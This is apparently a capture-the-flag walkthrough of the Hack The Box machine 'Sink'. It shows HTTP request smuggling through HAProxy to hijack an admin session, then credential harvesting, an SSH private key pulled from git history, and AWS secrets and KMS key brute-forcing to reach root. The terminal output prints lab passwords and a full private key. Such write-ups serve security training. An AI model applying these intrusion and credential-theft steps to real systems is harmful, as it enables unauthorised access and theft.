Sink is an Insane rated machine on HackThebox by MrR3boot which features a misconfiguration in a proxy that leads to HTTP-request-smuggling and access to a gitea application. In the gitea application we will dig through git logs to find a ssh key allowing us to log in as marcus. Next we will interact with AWS to retrieve a password for david. Finally we will use AWS again to query through keys and decrypt an encrypted archive which contains a yaml file with the root users password.
User
Nmap
We start our enumeration with a nmap scan on all ports, followed by a script and version detection scan on the open ones.
All ports
1
2
3
4
5
6
7
8
9
10
11
$ sudo nmap -p- -T4  10.129.186.209
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-14 13:02 GMT
Nmap scan report for 10.129.186.209
Host is up (0.054s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
5000/tcp open  upnp
Nmap done: 1 IP address (1 host up) scanned in 65.95 seconds
Script and version
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
$sudo nmap -p22,3000,5000 -sC -sV  10.129.186.209
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-14 13:05 GMT
Nmap scan report for 10.129.186.209
Host is up (0.026s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=6b0912499618100f; Path=/; HttpOnly
|     Set-Cookie: _csrf=HXs5kLtalxUspgbCsvobxqVdkms6MTYyODk0NjQyOTk5MDY0NjM0Mw; Path=/; Expires=Sun, 15 Aug 2021 13:07:09 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 14 Aug 2021 13:07:09 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless
|   HTTPOptions:
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=584057494e42233c; Path=/; HttpOnly
|     Set-Cookie: _csrf=T8BL8aSPLWtVJQk5Rp_m1X2FwCs6MTYyODk0NjQzNTE0MzEwNTMzNg; Path=/; Expires=Sun, 15 Aug 2021 13:07:15 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 14 Aug 2021 13:07:15 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
5000/tcp open  http    Gunicorn 20.0.0
|_http-server-header: gunicorn/20.0.0
|_http-title: Sink Devops
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.91%I=7%D=8/14%Time=6117BF9C%P=x86_64-pc-linux-gnu%r(Ge
...[snip]...
SF:>\n\t<meta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20with\
SF:x20a\x20c");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.13 seconds
HTTP-request-smuggling
Going over to port 3000 we see a gitea hosting default page.
Clicking on Explore=>Users we can identify possible usernames for the application and note them down for later.
On port 5000 there is gunicorn application, which letโs us register a user.
After signing up and logging in it looks like a blog and note keeping application.
Looking at a request submitting a comment to the blogpost we see a haproxy installation which might be vulnerable to CVE-2019-18277. The setup in the blogpost describing this vulnerability looks very similar to the setup at hand.
For it to work we have to obfuscate the Transfer-Encoding header with a vertical tab. This way the frontend proxy does not recognize it and forwards the request as a whole. The backend server however parses the header and sees two requests instead of one. Since the Content-Length in the next request is not reached a request by another user might get concatenated to our request. First we need to create the vertical tab in burp. We use python to do this and base64 encode it.
1
2
$ python -c "print('\v', end='')" | base64
Cw==
In Burp we then can decode it again in front of the chuncked value. Next we add an empty chunk which signifies the end of the request for the backend. Now we add another request to ours, also posting to comment using our cookie with a Content-Length longer as the message specified. This enables the next users request to get concatenated to ours.
Refreshing the page after about a minute(if we are too quick our own request gets concatenated), we see the start of another users http request in a comment field. The request doesnโt display any useful information yet sadly though because our Content-Length of 100 in the second request was too small.
We send another request increasing the Content-Length of the smuggled request to 300 this time.
Refreshing the page again after some time we were able to capture the full session cookie this time.
Replacing our cookie and refreshing, we are now logged in as the administrator user of the page.
Notes
Logged in as the admin we can now read his notes which reveals 3 username password pairs with a website and a short note.
| NR | Note | URL | Username | Password | 
|---|---|---|---|---|
| 1 | Chef Login | http://chef.sink.htb | chefadm | /6'fEGC&zEx{4]zz | 
| 2 | Dev Node | http://code.sink.htb | root | FaH@3L>Z3})zzfQ3 | 
| 3 | Nagios | https://nagios.sink.htb | nagios_adm | g8<H6GK\{*L.fB3C | 
Root already appeared as the usernames on gitea and trying this set of credentials we can log into gitea.
Key_Management
Going over to repositories, from the four being present Key_Management sounds the most interesting.
To have a better look at it we download it locally.
1
2
3
4
5
6
7
8
9
10
$ git clone http://10.129.186.209:3000/root/Key_Management
Cloning into 'Key_Management'...
Username for 'http://10.129.186.209:3000': root
Password for 'http://root@10.129.186.209:3000':
remote: Enumerating objects: 2630, done.
remote: Counting objects: 100% (2630/2630), done.
remote: Compressing objects: 100% (1230/1230), done.
remote: Total 2630 (delta 1079), reused 2600 (delta 1067)
Receiving objects: 100% (2630/2630), 2.26 MiB | 8.17 MiB/s, done.
Resolving deltas: 100% (1079/1079), done
Looking at the git history we see some interesting commits made by marcus.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
$ git log
commit 86ca6d11824a1b5c9527e0d60961cb0c653ac014 (HEAD -> master, origin/master, origin/HEAD)
Author: marcus <marcus@sink.htb>
Date:   Wed Dec 2 09:16:11 2020 +0000
    rotation fix on dev
commit 3e22d986a0da242bd371fd14971e8eab1b56bef4
Author: marcus <marcus@sink.htb>
Date:   Wed Dec 2 09:10:32 2020 +0000
    endpoint fix
commit f380655b3abfc05cdd14141cff7a8cf0e60977e9
Author: marcus <marcus@sink.htb>
Date:   Wed Dec 2 09:09:08 2020 +0000
    Preparing for Prod
commit b01a6b7ed372d154ed0bc43a342a5e1203d07b1e
Author: marcus <marcus@sink.htb>
Date:   Wed Dec 2 09:07:54 2020 +0000
    Adding EC2 Key Management Structure
commit 780f37fe507f05c9dfbaa1de0c371335415b7e21
Author: marcus <marcus@sink.htb>
Date:   Wed Dec 2 06:35:17 2020 +0000
    Remove aggressive actions
commit adba0abc75ab6ef2d9bd6a0d8b51fa66fa05e986
Author: marcus <marcus@sink.htb>
Date:   Wed Dec 2 06:33:38 2020 +0000
    Updating key policies
commit f20e6f6698ed1a75dcf23a113120675f480d6200
Author: marcus <marcus@sink.htb>
Date:   Wed Dec 2 06:29:03 2020 +0000
    adding code for listing keys from prod and dev nodes
commit d0e1b004491bb9b8cf3be315cfd8071b61867369
Author: marcus <marcus@sink.htb>
Date:   Wed Dec 2 06:26:00 2020 +0000
    pushing aws-sdk
commit ae23ca5b95123d5e9310c7887c0392fe7ab570f3
Author: root <admin@sink.htb>
Date:   Wed Dec 2 06:24:10 2020 +0000
    Initial commit
Checking out the difference between the head and commit b01a6b7ed372d154ed0bc43a342a5e1203d07b1e which states to add EC2 Key Management Structure, we find a private ssh key.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
$ git diff 86ca6d11824a1b5c9527e0d60961cb0c653ac014 b01a6b7ed372d154ed0bc43a342a5e1203d07b1e
diff --git a/.keys/dev_keys b/.keys/dev_keys
new file mode 100644
index 0000000..a9acff4
--- /dev/null
+++ b/.keys/dev_keys
@@ -0,0 +1,38 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+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
+-----END OPENSSH PRIVATE KEY-----
diff --git a/README.md b/README.md
index 782f239..135664a 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,3 @@
...[snip]...
With this key we can now log in as the user marcus, after setting the correct permissions on it and grab the user flag
1
2
3
4
5
6
7
8
9
10
11
$ vi marcus
$ chmod 600 marcus
$ ssh -i marcus  marcus@sink.htb
The authenticity of host 'sink.htb (10.129.71.3)' can't be established.
ECDSA key fingerprint is SHA256:7+5qUqmyILv7QKrQXPArj5uYqJwwe7mpUbzD/7cl44E.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'sink.htb' (ECDSA) to the list of known hosts.
...[snip]...
Last login: Wed Jan 27 12:14:16 2021 from 10.10.14.4
marcus@sink:~$ ls
user.txt
Root
Marcus => David
Listing all the ports listening on localhost we identify AWS on port 4566.
1
2
3
4
5
6
marcus@sink:~$ ss -ln | grep 127.0.0.1
tcp                LISTEN              0                    4096	127.0.0.1:4566                                 0.0.0.0:*
tcp                LISTEN              0                    100		127.0.0.1:25                                   0.0.0.0:*
tcp                LISTEN              0                    4096	127.0.0.1:33145                                0.0.0.0:*
tcp                LISTEN              0                    70		127.0.0.1:33060                                0.0.0.0:*
tcp                LISTEN              0                    151		127.0.0.1:3306                                 0.0.0.0:*
Checking the health of the AWS service we see 3 services running.
1
2
marcus@sink:~$ curl 127.0.0.1:4566/health
{"services": {"logs": "running", "secretsmanager": "running", "kms": "running"}}
To interact with the endpoint we have to first configure the AWS cli.
1
2
3
4
5
marcus@sink:~$ aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json
The secretsmanager looks interesting and we are able to list all the secrets contained in it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
marcus@sink:~$ aws --endpoint-url="http://127.0.0.1:4566" secretsmanager list-secrets
{
    "SecretList": [
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-rJNDd",
            "Name": "Jenkins Login",
            "Description": "Master Server to manage release cycle 1",
            "KmsKeyId": "",
            "RotationEnabled": false,
            "RotationLambdaARN": "",
            "RotationRules": {
                "AutomaticallyAfterDays": 0
            },
            "Tags": [],
            "SecretVersionsToStages": {
                "506b3175-c48b-4ecb-9ea7-d82c843d9f92": [
                    "AWSCURRENT"
                ]
            }
        },
		...[snip]...
Retrieving all the secrets from the secretsmanager, we get 3 usernames and 3 passwords.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
marcus@sink:~$ aws --endpoint-url="http://127.0.0.1:4566" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-rJNDd"
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-rJNDd",
    "Name": "Jenkins Login",
    "VersionId": "506b3175-c48b-4ecb-9ea7-d82c843d9f92",
    "SecretString": "{\"username\":\"john@sink.htb\",\"password\":\"R);\\)ShS99mZ~8j\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1618235159
}
marcus@sink:~$ aws --endpoint-url="http://127.0.0.1:4566" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-UnbOd"
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-UnbOd",
    "Name": "Sink Panel",
    "VersionId": "f8f25159-bf02-40a6-ba7a-57115edabf92",
    "SecretString": "{\"username\":\"albert@sink.htb\",\"password\":\"Welcome123!\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1618235159
}
marcus@sink:~$ aws --endpoint-url="http://127.0.0.1:4566" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-LSzMV"
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-LSzMV",
    "Name": "Jira Support",
    "VersionId": "2f7ac49a-3739-4e43-a369-cb26f6910bd8",
    "SecretString": "{\"username\":\"david@sink.htb\",\"password\":\"EALB=bcC=`a7f2#k\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1618235159
}
Since David is the only other user and he is also mentioned in the secrets, we use his password to switch to his account.
David => Root
In Davidโs home directory there is an encrypted file servers.enc in the Projects folder.
Looking for a fitting key to open the lock we configure AWS-CLI again for David and enumerate AWS KMS.
1
2
3
4
5
6
david@sink:~/Projects/Prod_Deployment$ aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json
david@sink:~/Projects/Prod_Deployment$
We can list all the keys within KMS and also look at the encryption algorithms possible with a key.
1
2
3
4
5
6
7
david@sink:~/Projects/Prod_Deployment$ aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys
{
    "Keys": [
        {
            "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac"
...[snip]...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
david@sink:~/Projects/Prod_Deployment$ aws --endpoint-url="http://127.0.0.1:4566/" kms describe-key --key-id "0b539917-5eff-45b2-9fa1-e13f0d2c42ac"
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
        "CreationDate": 1609757848,
        "Enabled": false,
        "Description": "Encryption and Decryption",
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Disabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "RSA_4096",
        "EncryptionAlgorithms": [
            "RSAES_OAEP_SHA_1",
            "RSAES_OAEP_SHA_256"
        ]
    }
}
There 11 keys with multiple possible algorithms per key. So it is best for us to not manually try each combination. In a first step we extract all the key ids from the endpoint like this.
1
david@sink:~/Projects/Prod_Deployment$ aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys  | grep KeyId | awk -F\" '{print $4}' > /tmp/key_ids
The second step is to get all the possible possible encryption algorithms, which we can do in the first command and then manually add them to a file.
1
2
3
4
5
6
7
8
9
10
david@sink:~/Projects/Prod_Deployment$ for key in $(cat /tmp/key_ids); do aws --endpoint-url="http://127.0.0.1:4566/" kms describe-key --key-id "$key"; done
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
        "CreationDate": 1609757848,
        "Enabled": false,
        "Description": "Encryption
...[snip]...
1
2
3
4
5
6
7
david@sink:~/Projects/Prod_Deployment$ echo RSAES_OAEP_SHA_1 > /tmp/enc
david@sink:~/Projects/Prod_Deployment$ echo RSAES_OAEP_SHA_256  >> /tmp/enc
david@sink:~/Projects/Prod_Deployment$ echo SYMMETRIC_DEFAULT  >> /tmp/enc
david@sink:~/Projects/Prod_Deployment$ cat /tmp/enc
RSAES_OAEP_SHA_1
RSAES_OAEP_SHA_256
SYMMETRIC_DEFAULT
With all preperations done we can now try all keys with the possible decryptions methods on the servers.enc
1
david@sink:~/Projects/Prod_Deployment$ for enc in $(cat /tmp/enc); do for key in $(cat /tmp/key_ids); do aws --endpoint-url="http://127.0.0.1:4566/" kms enable-key --key-id "$key"; aws --endpoint-url="http://127.0.0.1:4566/" kms decrypt --key-id "$key" --ciphertext-blob fileb:///home/david/Projects/Prod_Deployment/servers.enc --encryption-algorithm $enc --output text --query Plaintext; done;done
All of them but one error out but the succeeding one gives us a base64 encoded object.
1
2
3
4
...[snip]...
An error occurred (InternalFailureException) when calling the Decrypt operation (reached max retries: 4): key type not yet supported for decryption
H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=
...[snip]..
The base64 blob turns out to be a gzip compressed file with a tar archive inside. Decompressing and opening it gives us a new password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ echo -n H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA= | base64 -d > 1
$ file 1
1: gzip compressed data, from Unix, original size modulo 2^32 10240
$ mv 1 1.gz && gunzip 1.gz
$ file 1
1: POSIX tar archive (GNU)
$ tar -xvf 1
servers.yml
servers.sig
$ cat servers.yml
server:
  listenaddr: ""
  port: 80
  hosts:
    - certs.sink.htb
    - vault.sink.htb
defaultuser:
  name: admin
  pass: _uezduQ!EY5AHfe2
Using this password we can now switch to the root user on sink.
1
2
3
4
5
6
7
david@sink:~/Projects/Prod_Deployment$ su root
Password:
root@sink:/home/david/Projects/Prod_Deployment# id
uid=0(root) gid=0(root) groups=0(root)
root@sink:/home/david/Projects/Prod_Deployment# wc -c /root/root.txt
33 /root/root.txt
root@sink:/home/david/Projects/Prod_Deployment#
 
        
       
      
    










